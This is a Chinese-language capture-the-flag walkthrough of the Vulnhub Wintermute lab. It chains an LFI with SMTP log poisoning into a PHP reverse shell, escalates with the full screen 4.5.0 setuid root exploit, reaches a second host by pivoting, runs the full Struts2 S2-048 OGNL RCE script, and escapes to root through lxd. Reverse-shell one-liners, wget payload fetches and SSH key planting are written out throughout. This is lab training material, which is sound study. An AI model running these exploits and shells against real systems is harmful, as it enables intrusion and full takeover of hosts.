概要

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图

靶机 192.168.8.104

信息收集

$ nmap 192.168.8.103 --min-rate 1000 -sC -sV

结果:

Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-15 05:54 EDT
Nmap scan report for 192.168.8.103 (192.168.8.103)
Host is up (0.035s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
25/tcp   open  smtp            Postfix smtpd
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
| Not valid before: 2018-05-12T18:08:02
|_Not valid after:  2028-05-09T18:08:02
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http            Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open  hadoop-datanode Apache Hadoop
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
|_http-trane-info: Problem with XML parsing of /evox/about
| hadoop-tasktracker-info:
|_  Logs: submit
| hadoop-datanode-info:
|_  Logs: submit
Service Info: Host:  straylight

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

我们访问3000端口,发现存在一个ntopng服务

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图1

ntopng 是一个高性能的网络监控工具和流量分析平台。它提供了丰富的图形用户界面，用于实时监控网络流量和分析网络行为。ntopng 是 ntop 项目的升级版，具有更强的功能和更高的性能。

username:admin
password:admin

通过默认账密进入后台,发现在80端口还开放了一个目录turing-bolo

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图2

http://192.168.8.103//turing-bolo/

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图3

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图4

把图中三个文件拼接到url
molly.log
armitage.log
riviera.log

http://192.168.8.103//turing-bolo/bolo.php?bolo=molly.log

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图5

当我们删除.log后缀后

http://192.168.8.103//turing-bolo/bolo.php?bolo=molly

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图6

所以bolo.php会将传入的参数后缀加上.log再进行包含

根据Nmap扫描报告中,发现SMTP服务开启,那么在/var/log中必然存在一个mail.log的日志文件。

http://192.168.8.103//turing-bolo/bolo.php?bolo=/var/log/mail

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图7

$ nc -nC 192.168.8.103 25

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图8

http://192.168.8.103//turing-bolo/bolo.php?bolo=/var/log/mail

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图9

Get Shell

$ nc -lvnp 10032

http://192.168.8.103//turing-bolo/bolo.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.8.107%22%2C10032%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&bolo=/var/log/mail

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图10

Local.txt 截屏

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图11

Local.txt 内容

dainowandiawd

权限提升

$ find / -perm -u=s -type f 2>null

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图12

我们搜索权限提升的利用脚本

$ searchsploit screen 4.5.0

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图13

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PNET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

$ cd /tmp
$ wget http://192.168.8.107/root.sh
$ chmod +x root.sh
$ ./root.sh

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图14

Proot.txt 截屏

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图15

Proot.txt 内容

dainowandiawd

靶机 192.168.28.4

信息收集

在note.txt中发现了一段描述

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图16

Devs,

Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.

The engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.

Anyways, we've deployed the war file on tomcat as ordered - located here:

/struts2_2.3.15.1-showcase

It's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.

Regards,

Bob Laugh
Turing Systems Engineer II

管理员似乎添加了一个struts2_2.3.15.1,但似乎存在风险

通过arp发现局域网内还存在其他主机,所以我们需要横向

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图17

./chisel server -p 2333 --socks5

./chisel client 192.168.8.103:2333 socks

通过proxychais连接127.0.0.1:1080,这里你可以使用proxychains -h,来找到配置文件

进行扫描

$ proxychains -f ./internal.conf nmap 192.168.28.4 --min-rate 1000 -Pn

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图18

$ proxychains -f ./internal.conf nmap -p 8009,8080 192.168.28.4 -Pn -sC -sV

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图19

Get Shell

根据之前文档中提示,访问目录

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图20

$ searchsploit struts2

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图21

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Just a demo for CVE-2017-9791


import requests


def exploit(url, cmd):
    print("[+] command: %s" % cmd)

    payload = "%{"
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(@java.lang.Runtime@getRuntime().exec('%s'))" % cmd
    payload += "}"

    data = {
        "name": payload,
        "age": 20,
        "__checkbox_bustedBefore": "true",
        "description": 1
    }

    headers = {
        'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'
    }
    requests.post(url, data=data, headers=headers)


if __name__ == '__main__':
    import sys

    if len(sys.argv) != 3:
        print("python %s <url> <cmd>" % sys.argv[0])
        sys.exit(0)

    print('[*] exploit Apache Struts2 S2-048')
    url = sys.argv[1]
    cmd = sys.argv[2]

    exploit(url, cmd)

    # $ ncat -v -l -p 4444 &
    # $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"

首先我们要在主机B利用socat进行端口转发,在主机B本地监听10034端口,并且将数据转发至Kali机子192.168.8.107:10034

$ socat TCP-LISTEN:10034,fork,reuseaddr TCP:192.168.8.107:10034 &

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图22

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.28.3 10034 >/tmp/f

将以上命令保存至 re.sh

(Kali)$ python3 -m http.server 10034

(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "wget http://192.168.28.3:10034/re.sh -O /tmp/re.sh"

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图23

(kali)$ nc -lvnp 10034

(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "chmod +x /tmp/re.sh"

(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "sh /tmp/re.sh"

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图24

Local.txt 截屏

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图25

Local.txt 内容

dwhai1d2

权限提升

由于该连接及其不稳定所以我们通过ssh进行连接

我们尝试在/home命令下,检测写入权限

ta@neuromancer:/home$ for dir in /home/*/; do touch "$dir/1.txt"; done

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图26

发现用户:ta可以创建文件

ta@neuromancer:/home$ ssh-keygen
ta@neuromancer:/home$ cat /home/ta/.ssh/id_rsa
ta@neuromancer:~/.ssh$ cat id_rsa.pub >authorized_keys

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图27

复制私钥保存到kali,文件名id_rsa

(kali)$ chmod 400 id_rsa

但是对方ssh服务开放在端口34483。

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图28

(kali)$ proxychains -f internal.conf ssh -i id_rsa [email protected] -p 34483

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图29

我们发现用户ta存在于lxd组,我们可以利用它进行提权

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图30

(kali)$ git clone https://github.com/saghul/lxd-alpine-builder.git

(kali)$ cd lxd-alpine-builder

构建包

(kali)$ sudo ./build-alpine

(192.168.8.103)$ socat TCP-LISTEN:10035,fork,reuseaddr TCP:192.168.8.107:10035 &

(kali)$ python3 -m http.server 10035

ta@neuromancer:/tmp$ wget http://192.168.28.3:10035/alpine-v3.20-x86_64-20240613_1112.tar.gz /tmp/alpine-v3.20-x86_64-20240613_1112.tar.gz

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图31

ta@neuromancer:/tmp$ lxc image import /tmp/alpine-v3.20-x86_64-20240613_1112.tar.gz --alias test

ta@neuromancer:/tmp$ lxc image list

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图32

ta@neuromancer:/tmp$ lxc init test ignite -c security.privileged=true

lxc init myimage ignite：初始化一个名为 ignite 的容器，基于 myimage 镜像。
-c security.privileged=true：配置容器为特权容器。这意味着容器中的进程将以 root 权限运行，并且可能直接访问宿主机的设备和文件系统。

ta@neuromancer:/tmp$ lxc config device add ignite test disk source=/ path=/mnt/root recursive=true

选择 /mnt/root 作为挂载点是为了确保挂载操作安全、明确和无冲突。通过这种方式，你能够在容器内方便地访问和操作宿主机的文件系统，从而实现提权操作。

lxc config device add ignite mydevice disk：向 ignite 容器添加一个名为 mydevice 的设备，类型为 disk。
source=/：指定宿主机的根目录 / 作为源目录。
path=/mnt/root：在容器内将该目录挂载到 /mnt/root。
recursive=true：递归挂载，包含子目录。

$ lxc start ignite

$ lxc exec ignite /bin/sh

成功逃逸

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图33

Proot.txt 截屏

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图34

Local.txt 内容

diwoinwad

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…插图35

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…

概要

靶机 192.168.8.104

信息收集

Get Shell

Local.txt 截屏

Local.txt 内容

权限提升

Proot.txt 截屏

Proot.txt 内容

靶机 192.168.28.4

信息收集

Get Shell

Local.txt 截屏

Local.txt 内容

权限提升

Proot.txt 截屏

Local.txt 内容

相关文章

发布评论取消回复

[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…

概要

靶机 192.168.8.104

信息收集

Get Shell

Local.txt 截屏

Local.txt 内容

权限提升

Proot.txt 截屏

Proot.txt 内容

靶机 192.168.28.4

信息收集

Get Shell

Local.txt 截屏

Local.txt 内容

权限提升

Proot.txt 截屏

Local.txt 内容

相关文章：

相关文章

发布评论 取消回复

发布评论取消回复